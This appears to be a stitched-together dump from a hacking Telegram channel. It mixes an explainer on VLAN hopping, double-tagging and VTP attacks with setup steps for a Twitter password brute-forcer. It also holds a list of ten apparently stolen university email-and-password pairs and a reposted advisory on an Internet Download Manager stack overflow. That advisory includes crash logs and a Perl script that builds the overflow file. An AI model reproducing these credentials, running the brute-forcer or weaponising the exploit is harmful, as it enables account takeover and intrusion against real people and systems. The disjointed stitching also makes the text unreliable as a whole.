▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Comprehensive analysis of VLAN attacks


1) The VLAN attack method is an attack method adopted by hackers based on the application of VLAN technology. In the face of these tricky refurbished attack methods, how to take effective preventive measures? In this article, we will introduce the hacker's attack methods and methods for networks managed by VLAN technology We can take defensive measures.


🦑 The common VLAN attacks are as follows:

1) VLAN attack 1.802.1Q and ISL tag attack

A tag attack is a malicious attack. With it, users on one VLAN can illegally access another VLAN. For example, if the switch port is configured as DTP (DYNAMIC TRUNK PROTCOL) auto to receive fake DTP (DYNAMIC TRUNK PROTCOL) packets, it will become a trunk port and may receive traffic to any VLAN. Thus, malicious users can communicate with other VLANs through the controlled ports. Sometimes even if only receiving ordinary packets, the switch port may violate its original intention and operate like an all-round trunk port (for example, receiving packets from other VLANs than the local one). This phenomenon is often called "VLAN leakage."

> For this kind of attack, simply set the DTP (DYNAMIC TRUNK PROTCOL) on all untrusted ports (not meeting the trust condition) to "Off" to prevent this kind of attack. The software and hardware running on the Cisco Catalyst 2950, ​​Catalyst 3550, Catalyst 4000, and Catalyst 6000 series switches can also implement proper traffic classification and isolation on all ports.

2) VLAN attack 2. Double encapsulation 802.1Q / nested VLAN attack

Inside the switch, VLAN numbers and identifications are expressed in a special extended format, the purpose is to keep the forwarding path independent of the end-to-end VLAN without losing any information. Outside the switch, the marking rules are specified by standards such as ISL or 802.1Q.

> ISL belongs to Cisco's proprietary technology and is a compact form of the extended packet header used in the device. Each packet always gets a mark, and there is no risk of logo loss, which can improve security.

> On the other hand, the IEEE committee that developed 802.1Q decided that for backward compatibility, it is best to support intrinsic VLANs, that is, VLANs that are not explicitly related to any tags on the 802.1Q link. This VLAN is used implicitly to receive all untagged traffic on the 802.1Q port.

> This feature is what users want, because with this feature, the 802.1Q port can directly talk to the old 802.3 port by sending and receiving unmarked traffic. However, in all other cases, this feature can be very harmful, because when transmitted over an 802.1Q link, packets associated with the native VLAN will lose their tags, such as their class of service (802.1p bits).

2) Stripped first, then sent back to the attacker 802.1q frame, VLAN A, VLAN B data contains the trunk VLAN B data of the native VLAN A

Note: Only if the trunk's native VLAN is the same as the attacker's, will it take effect.

3) When double-encapsulated 802.1Q packets happen to enter the network from devices with the same VLAN as the eigen VLAN of the trunk, the VLAN IDs of these packets will not be retained end-to-end, because the 802.1Q trunk will always modify the packet, that is, strip off its outside mark. After removing the external tag, the internal tag will become the unique VLAN identifier of the packet. Therefore, if the packet is double-encapsulated with two different tags, the traffic can jump between different VLANs.

5) This situation will be regarded as a misconfiguration, because the 802.1Q standard does not force users to use the native VLAN in these situations. In fact, the proper configuration that should always be used is to clear the native VLAN from all 802.1Q trunks (setting it to 802.1q-all-tagged mode can achieve the exact same effect). When the local VLAN cannot be cleared, the unused VLAN should be selected as the local VLAN of all trunk roads, and the VLAN cannot be used for any other purpose. Protocols such as STP, DTP (DYNAMIC TRUNK PROTCOL) and UDLD should be the only legal users of the local VLAN, and their traffic should be completely isolated from all data packets.

6) VLAN attack 3. VLAN hopping attack

Virtual local area network (VLAN) is a method of segmenting the broadcast domain. VLANs are also often used to provide additional security for the network because computers on one VLAN cannot talk to users on another VLAN without explicit access. However, VLAN itself is not enough to protect the security of the environment. Malicious hackers can jump from one VLAN to another even if they are not authorized.

7) VLAN hopping (VLAN hopping) relies on the dynamic relay protocol (DTP (DYNAMIC TRUNK PROTCOL)). If there are two interconnected switches, DTP (DYNAMIC TRUNK PROTCOL) can negotiate the two to determine whether they will become 802.1Q trunks. The negotiation process is done by checking the configuration status of the port.

8) The VLAN hopping attack makes full use of DTP (DYNAMIC TRUNK PROTCOL). In the VLAN hopping attack, a hacker can deceive the computer and impersonate another switch to send a fake DTP (DYNAMIC TRUNK PROTCOL) negotiation message, announcing that it wants to become a relay; the real one After receiving this DTP (DYNAMIC TRUNK PROTCOL) message, the switch thought that it should enable the 802.1Q relay function, and once the relay function was enabled, the information flow through all VLANs would be sent to the hacker's computer.

10) After the relay is established, the hacker can continue to detect the information flow, or it can specify the VLAN to which the attack traffic is sent by adding 802.1Q information to the frame.

11) VLAN attack 4. VTP attack

VLAN Trunk Protocol (VTP, VLAN Trunk Protocol) is a management protocol that can reduce the number of configurations in the switching environment. As far as VTP is concerned, the switch can be a VTP server, a VTP client, or a VTP transparent switch. Here we focus on the VTP server and the VTP client. Every time the user changes the configuration of the switch working in the VTP server mode, the VTP configuration version number will increase by 1 whether the VLAN is added, modified or removed. After the VTP client sees that the configuration version number is greater than the current version number, It will automatically synchronize with the VTP server.

12) A malicious hacker can use VTP for his own purposes and remove all VLANs on the network (except the default VLAN), so that he can enter the same VLAN where every other user is. However, the user may still be on a different network segment, so a malicious hacker needs to change his IP address to enter the same network segment as the host he wants to attack.

A malicious hacker can make full use of VTP by connecting to the switch and establishing a relay between his computer and the switch. A hacker can send a VTP message to the VTP server whose configuration version number is higher than the current one. This will cause all switches to synchronize with the malicious hacker's computer, thereby removing all non-default VLANs from the VLAN database.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Comprehensive analysis of VLAN attacks full

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑hack twitter
> Multi-thread Twitter BruteForcer in Shell Script

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/thelinuxchoice/tweetshell

2) cd tweetshell

3) chmod +x tweetshell.sh

4) sudo ./tweetshell.sh

🦑Install requirements (Curl):
chmod +x install.sh
sudo ./install.sh

✅ verified

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

# SUPPORT & SHARE

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Send me screanshoats after logins to send more accounts

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑EDU ACCOUNTS-UNIVERSITY OF PHONIX ✅
> THIS WILL REDIRECT YOU TO THE LOGIN PAGE
>must know student name

> start login here
https://login.microsoftonline.com/

jennifer.pesantez79@myhunter.cuny.edu:Ahmed0814
abracken@drury.edu:spiderman12
jamietaylor39@email.phoenix.edu:Nothiscar12
alexiskklein@email.phoenix.edu:Ak12345678
tcjacoby0908@email.phoenix.edu:Jakob1234
bn1999@go.byuh.edu:TidoBreezy7
yaqoobmumar@uaf.edu.pk:Pakistan143
beonka23@email.phoenix.edu:trujillo25
mgonzalez08@email.phoenix.edu:Iluvu2joel
robertson2@email.phoenix.edu:Brooklyn2


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 cve idm (down manager) ✅✅
Technical Details & Description:
================================
Multiple stack buffer overflow vulnerabilities has been discovered in
the official Internet Download Manager v6.37.11.1 software.
The bufer overflow allows to overwrite registers of the process to
compromise the file-system by elevates local process privileges.

1.1
The first stack buffer overflow is located in the search function of
the downloads menu. The search function itself does not use
any secure restriction in the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. Thus allows a local
attacker to compromise the local computer- or file-system.

1.2
The second stack buffer overflow is located in the Export/Import
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.

The security risk of the local stack buffer overflow vulnerabilities in
the software are estimated as high with a cvss count of 7.1.
Exploitation of the buffer overflow vulnerability requires a low
privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in overwrite of the
active registers to compromise of the computer system or process.

Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)


Proof of Concept (PoC):
=======================
1.1
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashs with several uncaught exception because of
overwritten register (0168D8F0)
5. Successful reproduce of the local buffer overflow vulnerability!


--- Debug Logs (0168D8F0) ---
00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141
-
00D6186D |. 56 PUSH ESI ; /Arg1
-
00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ;
IDMan.00D617E0
-
00D6189B |> 50 PUSH EAX ; /Arg1
-
00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ;
IDMan.00D617E0
-
Call stack
Address=0168C79C
Stack=00DFE0F2
Procedure / arguments=IDMan.00D617E0
Called from=IDMan.00DFE0ED
Frame=0168E02C
-
SEH chain
Address SE handler
0168C790 IDMan.00F751E8
0168D8F0 41414141
-
EAX 41414141
ECX 01680000
EDX 41414141
EBX 00000001
ESP 0168C76C
EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
EDI 00410043
EIP 00D61850 IDMan.00D61850
Executable modules
Base=00D60000
Size=00539000 (5476352.)
Entry=00F5CB1C IDMan.<ModuleEntryPoint>
Name=IDMan
File version=6, 37, 11, 2
Path=C:Program Files (x86)Internet Download ManagerIDMan.exe


1.2
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the software
2. Start the bof_poc.pl
3. Open the tasks menu
4. Click import and import *.ef2 poc
Note: The software process crashs on import with uncaught exception
5. Successful reproduce of the local buffer overflow vulnerability!

Usage Example: Export/Import (*.ef2)
<
https://www.vulnerability-lab.com/download_content.php?id=1337
referer: https://www.vulnerability-lab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
>


PoC: Exploit
#!/usr/bin/perl
# Local Stack Buffer Overflow Exploit for Internet Download Manager
v6.37.11.1
# Vulnerability Laboratory - Benjamin Kunz Mejri
my $poc = "bof_poc.ef2" ;
print "[+] Producing bof_poc.ef2 ..." ;
my $buff0=" "."<" x 1;
my $buff1=" n https://"."A" x 1024;
my $buff2=" n Referer:"."A" x 1024;
my $buff3=" n User Agent:"."A" x 1024;
my $buff4=" n ".">" x 1;
open(ef2, ">>$poc") or die "Cannot open $poc";
print ef2 $buff0;
print ef2 $buff1;
print ef2 $buff2;
print ef2 $buff3;
print ef2 $buff4;
close(ef2);
print "n[+] done !";


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


--
VULNERABILITY LABORATORY - RESEARCH TEAM

✅Verified by Undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 cve idm (down manager) full ✅